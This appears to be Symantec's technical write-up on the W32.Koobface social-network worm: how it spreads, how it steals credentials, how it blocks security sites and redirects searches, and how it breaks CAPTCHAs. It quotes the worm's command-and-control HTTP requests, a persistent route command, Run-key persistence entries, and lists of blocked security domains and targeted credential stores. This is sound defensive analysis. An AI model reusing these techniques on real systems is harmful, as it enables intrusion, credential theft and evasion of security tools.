1. /
  2. Security Response/
  3. W32.Koobface

W32.Koobface

Risk Level 2: Low

Discovered:
August 3, 2008
Updated:
August 8, 2012 2:44:59 PM
Also Known As:
Net-Worm.Win32.Koobface.b [Kaspersky], W32/Koobface.worm [McAfee], Boface.A [Panda Software], WORM_KOOBFACE.V [Trend], W32/Koobface-AS [Sophos], W32/Koobface-AL [Sophos], W32/Koobface-AD [Sophos], Koobface.GQ [Panda Software], Koobface.FU [Panda Software], W32/Koobface-N [Sophos], WORM_KOOBFACE.JG [Trend], WORM_KOOBFACE.EX [Trend], WORM_KOOBFACE.EY [Trend], WORM_KOOBFACE.BX [Trend], W32/Koobface.CZ [F-Secure], WORM_KOOBFACE.AZ [Trend], Net-Worm:W32/Koobface.ES [F-Secure], Win32/Koobface.AC [Computer Associates], W32/Koobface.CY [F-Secure], W32/Koobface.BM [F-Secure], WORM_KOOBFACE.F [Trend], WORM_KOOBFACE.E [Trend], Kbface [Panda Software], WORM_KOOBFACE.D [Trend], Troj/Mdrop-CMW [Sophos]
Type:
Worm
Infection Length:
Varies
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Patch operating system and software
2. Infection method
3. Functionality
3.1 Installation
3.2 DNS blocking
3.3 Infostealing
3.4 Search results redirection
3.5 Network traffic redirection
3.6 Web server
3.7 CAPTCHA breaking

4. System modifications
5. Network activity
6. Additional information



1. PREVENTION AND AVOIDANCE
The following actions can be taken to avoid or minimize the risk from this threat .


1.1 User behavior and precautions
This threat may be spread by users actively clicking on links posted to social networking sites. A social engineering lure is often used by the malware creators; a common technique is to add some kind of salacious or sensational news or a statement that will pique the user's interest and entice them to click on the bogus links.

Users of social networking sites should always show caution when clicking on links posted by other users, including their friends. Poor grammar and spelling in messages bundled with the link are often a good sign that the link is not legitimate and was not posted by the supposed user. Basic checks such as hovering with the mouse pointer over the link will normally show where the link leads to. Users can also check online website rating services, such as safeweb.norton.com, to see if the site is deemed safe to visit.

Users should be wary of any sites offering videos but then state that a codec or other software is necessary to view the video. These videos are often booby-trapped with malicious software and are a known method by way of which this threat can spread.


1.2 Patch operating system and software
Users are advised to ensure that their operating systems and any installed software are fully patched, and that antivirus and firewall software is up to date and operational. Users are recommended to turn on automatic updates if available so that their computers can receive the latest patches and updates when they are made available.



2. INFECTION METHOD
W32.Koobface spreads primarily through social networking sites as links to videos. When a user visits the website that is hosting the video, they are prompted to download a video codec or other necessary update, which is actually a copy of the worm.

The web servers hosting the fake websites and the worm executable are actually computers compromised by the worm. W32.Koobface constantly changes the style of fake websites and has previously used fake Facebook video pages, Youtube pages, CNET download pages, Facebook security pages, and online virus scan pages. A single compromised computer acting as a Koobface web server can host multiple versions of these fake sites.








To spread in social networking sites, the worm searches for browser cookies on the compromised computer to check which social networking sites are used. If any are found, the command and control server may request the compromised computer to download a component that is designed to spread the worm on that specific social networking site.

The following is an example of files downloaded, saved, and executed based on which social networking site the code targets:

Social networking site: Facebook
File name used in GET request: fb[VERSION NUMBER].exe
File name when saved: freddy[VERSION NUMBER].exe
Social networking site: hi5
File name used in GET request: hi[VERSION NUMBER].exe
File name when saved: hippy[VERSION NUMBER].exe
Social networking site: MySpace
File name used in GET request: ms[VERSION NUMBER].exe
File name when saved: mstre[VERSION NUMBER].exe
Social networking site: Twitter
File name used in GET request: tw[VERSION NUMBER].exe
File name when saved: twitty[VERSION NUMBER].exe
Social networking site: Bebo
File name used in GET request: be[VERSION NUMBER].exe
File name when saved: sber[VERSION NUMBER].exe
Social networking site: Tagged
File name used in GET request: tg[VERSION NUMBER].exe
File name when saved: tag[VERSION NUMBER].exe
Social networking site: Netlog
File name used in GET request: nl[VERSION NUMBER].exe
File name when saved: nl[VERSION NUMBER].exe
Social networking site: Fubar
File name used in GET request: fu[VERSION NUMBER].exe
File name when saved: fu[VERSION NUMBER].exe
Social networking site: Friendster
File name used in GET request: fr[VERSION NUMBER].exe
File name when saved: fr[VERSION NUMBER].exe
Social networking site: MyYearbook
File name used in GET request: yb[VERSION NUMBER].exe
File name when saved: yb[VERSION NUMBER].exe


The files are requested from the Command and Control server and saved to the %Windir% folder.

The worm does not necessarily serve all the propagation components all the time. For example, a user who utilizes all of these social networks may only receive modules for some of them.

These modules contain code specific to the social network being targeted. Using the session authentication cookie on the compromised computer, the worm is able to pose as the user and post malicious links to contacts in the user’s social network.

For example, when a user is logged into Facebook and a browser window is open, the worm will hide the browser window to hide its activities from the user. With no visible window to make the affected user suspicious, it then posts the messages containing malicious links that are provided by the command and control server.

The following is an example of how the Facebook module spreads W32.Koobface on Facebook.
The worm first sends a message through Facebook to all the friends of an infected user. It is able to do this by hijacking the Facebook session authentication cookie on the compromised computer. The worm will also convert Firefox cookies into Internet Explorer cookies when it needs to.

A friend of an infected Facebook user might receive the message to view an interesting video or have a similar link posted to their Facebook wall.







If the user clicks on the malicious link, they are led to a malicious web site that eventually redirects the user to a fake video page. The fake video page prompts the user to download a codec to view the video. The codec is actually the worm installer.








3. FUNCTIONALITY

The worm is able to perform the following functions:
  • Spread through social networks
  • Steal confidential information
  • Inject advertising into web browsers
  • Redirect web browsing to malicious sites
  • Intercept Internet traffic
  • Block access to certain Internet sites
  • Start a web server to serve as a command and control server for other Koobface infections
  • Download additional files, such as updates to itself and other pay per install software that includes fake security products
  • Steal software license keys
  • Break CAPTCHAs
  • Determine if a link is blocked by Facebook
  • Create new Blogspot accounts and pages
  • Modify the Hosts file


3.1 Installation
W32.Koobface arrives as a file often posing as a fake codec installer (i.e. setup.exe) after clicking a link on a social networking site. Upon execution, it copies itself into the Windows directory. The file name used for the copy is hardcoded and depends on what version or build of the worm it is (e.g. ld02.exe, ld10.exe, ld14.exe, etc.).

The worm also has a self-checking routine where it verifies if the main component is running inside the Windows directory (C:\Windows\[VARIANT].exe) under the file name used by the current version of the component (e.g. C:\Windows\ld14.exe). If it is not, it copies itself into the aforementioned directory, runs the copy, and then drops a batch file (C:\[VARIANT].bat) that deletes the current executable after it terminates.

It creates a mutex so that only one instance of the worm is running on the compromised computer with a name containing alpha-numeric characters. The mutex name is hardcoded but it appears to be randomly generated before it was hardcoded. The name may also vary in each version or build of the worm.

Note: The names used for the objects and file names for any components vary in different variants.

It creates the following registry entry so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”sys[VARIANT]tray” = "%Windir%\[VARIANT][VERSION NUMBER].exe"

Note: The following registry entries are examples of the above registry entry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”sysldtray” = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"


3.2 DNS blocking
The worm prevents the compromised computer from visiting a variety of domains of which are mostly well-known security websites. The module performing this action is typically named v2prx.exe and drops the following two files:
  • ddnsFilter.dll or filter.sys
  • fio32.dll or fio32.sys

Any domains containing the following substrings are blocked:
  • a-2.org
  • agnitum
  • aluriasoftware
  • antivir
  • antiviraldp
  • anti-virus
  • attechnical
  • authentium
  • avast
  • avgfrance
  • avg.
  • avp.
  • bitdefender
  • blackice
  • ccsoftware
  • centralcommand
  • deerfield
  • dialognauka
  • diamondcs
  • drsolomon
  • drweb
  • eicar
  • emsisoft
  • esafe
  • eset
  • fileburst
  • finjan
  • fmsinc
  • free-av
  • f-secure
  • gecadsoftware
  • grisoft
  • gwava
  • hackerwatch
  • housecall
  • iavs.cz
  • ieupdate
  • ikarus-software
  • inline-software
  • javacoolsoftware
  • kaspersky
  • kerio
  • k-otik
  • lavasoft
  • liutilities
  • looknstop
  • malwarebytes
  • mcafee
  • megasecurity
  • microworldsystems
  • misec
  • moosoft
  • my-etrust
  • networkassociates
  • noadware
  • nod32
  • norman.no
  • nsclean
  • openantivirus
  • pandasoftware
  • pestpatrol
  • psnw.
  • pspl.
  • ravantivirus
  • safer-networking
  • safetynet
  • sald.com
  • securitoo
  • secuser
  • simplysup
  • sophos
  • spyblocker-software
  • spycop
  • spywareguide
  • stiller
  • sybari
  • sygate
  • symantec
  • tinysoftware
  • toonbox
  • trapware
  • trendmicro
  • turvamies
  • viguard
  • viruslist
  • virustotal
  • visualizesoftware
  • vsantivirus
  • wilderssecurity
  • wildlist
  • windowsupdate
  • winpatrol
  • x-cleaner
  • zeylstra
  • zonelabs
  • zonelog

In addition, the configured DNS server may be changed.


3.3 Infostealing
W32.Koobface is able to steal confidential information. This functionality is implemented in a separate module and has been seen to be downloaded and saved using the following file names:
  • go.exe
  • get.exe

Using this module, the worm gathers system information - such as product ID, installed applications, usernames, POP3 server, login credentials, and user locale - and compiles the data into P3ML format. The worm uses base64 to encode this collected information and posts it to one of its command and control servers.

Targeted login credentials include FTP, email, Instant Messaging, web profiles, and filesharing accounts, and include login credentials of the following applications:
  • Becky! Internet Mail
  • Coffeecup Software
  • cuteFTP
  • Depositfiles
  • Eudora
  • FTP commander
  • FileZilla
  • FlashFXP
  • GAIM
  • ICQ
  • Ipswitch
  • Mail.ru
  • Megaupload
  • Microsoft Outlook
  • Mozilla
  • Mozilla Thunderbird
  • Opera
  • Outlook Express
  • Passport.NET
  • Punto Switcher
  • QIP
  • RITLabs The Bat! Email client
  • Rapget
  • Rapidshare
  • SmartFTP
  • Total Commander
  • Trillian
  • Universal Share Downloader
  • Windows Live

In addition, the worm gathers and steals social networking profile information. Social networks store a variety of information, such as geographic location, birth date, activities, schools attended, email addresses, contact lists, and interests. This information is gathered and sent to the command and control server through HTTP POST requests.




Decoding the requests conforms the wide range of information collected and sent to the command and control server.





3.4 Search results redirection
The worm has the ability to inject code into web search results listings. When clicking on a valid link in a search results listing, it redirects the user to advertising or other malicious content. Again this functionality is implemented as a downloadable module.

This module has been seen distributed in two ways:
  1. Separate files (BrowserCtl.dll or BrowserCtl.sys)
  2. Integrated into the DNS blocker component (DDnsFilter.DLL)

The module searches for the following tokens or substrings in a URL to find potential searches or queries to hijack:
  • hTtp/1.1 404 reSOURcE NoT FOunD\r\n\r
  • google
  • search.yahoo
  • search.msn
  • search.live
  • bing
  • search.aol
  • ask
  • search.mywebsearch
  • inurl:
  • related:
  • intitle:
  • intext:
  • cache:
  • tbns:
  • toolbarqueries
  • googleadservices
  • sugg.search
  • img.youtube.com
  • .yimg.com
  • metacafe.com
  • yahooapis.com
  • .aolcdn.com
  • .sa.aol.com

Manipulated search results may point users to rigged web sites controlled by the attacker. These web sites may serve fake virus infection warnings and lead users to download other malware, such as misleading applications.





The following is an example of the sequence of transactions between the search redirector and the command and control server.

First, a user searches for ‘stanley’ using google.com:

GET /complete/search?hl=en&q=stanley HTTP/1.1
Referer: http://www.google.com/

The worm detects the search and sends the same search term to the Koobface command and control server. The command and control server returns information on where to redirect the user:

GeT /v50/?v=92&s=G&uid=-207922....&p=1000&q=stanley HttP/1.0

When clicking on a result listing, the compromised computer is instead redirected to a fake security scan site used to spread misleading applications.

POST /click.php?c=6cd95921027704e5677a3f732600 HTTP/1.1

GET /online/9eb761c878134c642afeef551b8048ca/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2 HTTP/1.1


3.5 Network traffic redirection
W32.Koobface may reroute outbound Internet traffic if directed by the command and control server. When the command BLOCKIP is given by the command and control server, the worm agent adds an entry with the following format to the local IP routing table:

route add -p [DEST_ADDRESS] mask [SUBNET_MASK] [HOP_ADDRESS] metric 3

This entry adds a persistent route to the destination [DEST_ADDRESS] with a subnet mask of [SUBNET_MASK], a next hop address of [HOP_ADDRESS], and a cost metric of 3. Through this, the BLOCKIP command would intercept traffic trying to reach the defined network address range. However, typically the worm uses this feature solely to block access to certain network ranges.


3.6 Web server
The worm may start a web server on the compromised computer, the primary purpose being to spread itself.

The following file is the module that acts as the web server:
%ProgramFiles%\webserver\webserver.exe

Files to be served by the web server are stored in an XML file named:
%ProgramFiles%\webserver\webserver.dat

Using the Windows netsh tool, the web server module modifies the exception list of the Windows Firewall to allow incoming connections to TCP ports 80 and 53.

Note: As of this writing, this component has no DNS server functionality and neither TCP nor UDP port 53 is used at any time.

It installs itself as a service named webserver using Windows’ sc utility.

The XML-formatted data file (webserver.dat) contains the latest binary installer of the worm (e.g., setup.exe) and the related HTML pages, icons, or images used for the campaign websites shown to the target user, such as fake Facebook video pages, fake YouTube video pages, or fake CNET download pages.

The web server reports to a remote server and then receives an XML file from the C&C domain and saves it into a .dat file inside the %ProgramFiles%\webserver folder.

The web server module on a newly compromised computer first contacts another compromised computer, which serves as a command and control server, to retrieve the files to distribute.

POST /webserver/?uptime=782254&v=0&sub=56&ping=135&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 0

HTTP/1.1 200 OK
Date: [DATE]
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: [CONTENT_SIZE]
Connection: close
Content-Type: text/xml
[XML data file]

The command and control server will then contact the newly compromised computer to determine the computer’s uptime and to ensure the web server module is working correctly.

Note: The worm’s web server pretends to be running “Apache/1.3.27 (Unix) (Red-Hat/Linux).”

GET /?uptime HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 13
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: text/html
uptime=782255

Finally, the command and control server also verifies that the newly compromised computer is properly distributing the worm.

GET /pid=1000/setup.exe HTTP/1.0
Sample Web server response:
HTTP/1.1 200 OK
Content-Length: 38656
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: application/octet-stream

[KOOBFACE INSTALLER BINARY]

Whenever the worm’s web server is accessed, the component includes the access logs in its report to the command and control server. Each log has the following format:
[HOST_IP_ADDRESS]|[USER_AGENT_INFO]|[URL]|[DOMAIN_REDIRECTOR]|[COMPONENT_DIRECTORY]|1000
POST /webserver/?uptime=1004&v=158&sub=56&ping=68&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 323
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|||ms|1000
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|[http://]74.2.159.54/pid=1000/view/f=ms/console=ye[REMOVED]

HTTP/1.1 200 OK
Date: Thu, 12 Nov 2009 01:27:56 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: 96
Connection: close
Content-Type: text/xml
<?xml version="1.0"?><webserver is_available="yes" version="158" stats_loaded="yes"></webserver>


3.7 CAPTCHA breaking
The worm may encounter CAPTCHAs when trying to post to social networking sites. CAPTCHA is a method devised to prevent automated systems from accessing services designed to be used by humans. They are often used in website sign up processes to prevent automated account creation. To help it bypass these CAPTCHAs, Koobface will upload the CAPTCHAs to the command and control server, which will display the CAPTCHA on a compromised computer. The CAPTCHA is displayed in full-screen mode and does not allow the user to continue to use the compromised computer until they solve the CAPTCHA.

The CAPTCHA solution is then forwarded back to the originally requesting computer. Using this method the controllers of the Koobface botnet can not only leverage the compromised computers for their own gain but they also coerce the users of those computers to perform work for them. This in effect creates a worldwide distributed work force that works for the Koobface controllers for free.






4. SYSTEM MODIFICATIONS

The following side effects may be observed on computers compromised by members of threat family.


Files/folders created
One or more of the following files:
  • be[VERSION NUMBER].exe
  • fb[VERSION NUMBER].exe
  • fr[VERSION NUMBER].exe
  • fr[VERSION NUMBER].exe
  • freddy[VERSION NUMBER].exe
  • fu[VERSION NUMBER].exe
  • fu[VERSION NUMBER].exe
  • hi[VERSION NUMBER].exe
  • hippy[VERSION NUMBER].exe
  • ms[VERSION NUMBER].exe
  • mstre[VERSION NUMBER].exe
  • nl[VERSION NUMBER].exe
  • nl[VERSION NUMBER].exe
  • sber[VERSION NUMBER].exe
  • tag[VERSION NUMBER].exe
  • tg[VERSION NUMBER].exe
  • tw[VERSION NUMBER].exe
  • twitty[VERSION NUMBER].exe
  • yb[VERSION NUMBER].exe
  • yb[VERSION NUMBER].exe


Files/folders deleted
None


Files/folders modified
None


Registry subkeys/entries created
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”sys[VARIANT]tray” = "%Windir%\[VARIANT][VERSION NUMBER].exe"

Note: The following registry entries are examples of the above registry entry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”sysldtray” = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"


Registry subkeys/entries deleted

None


Registry subkeys/entries modified (final values given)
None



5. NETWORK ACTIVITY
The threat may perform the following network activities.


Downloading
  • May download additional files that are code modules containing additional functionality, updates, or configuration files.
  • May download advertisements from the following sites:
    • [http://]91.188.59.186/main[REMOVED]
    • [http://]91.188.59.187/main[REMOVED]
    • [http://]www.kyxct.in/get[REMOVED]
    • [http://]195.78.108.230/get[REMOVED]
    • [http://]www.lskjf.in/get[REMOVED]
    • [http://]www.rtlyh.in/get[REMOVED]
    • [http://]www.ptyoj.in/get[REMOVED]


Uploading
May upload confidential information to a remote location.


Other network activity
  • May block access to specified domains by performing DNS blocking or modifying the Hosts file.
  • May reroute outbound Internet traffic to specified domains.
  • May redirect web search results to advertising or other malicious content.



6. ADDITIONAL INFORMATION
For more information relating to this threat family, please see the following resources:

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Eric Chien and Jarrad Shearer
Summary| Technical Details| Removal

Search Threats

Search by name
Example: W32.Beagle.AG@mm
STAR Antimalware Protection Technologies
Internet Security Threat Report
Symantec DeepSight Screensaver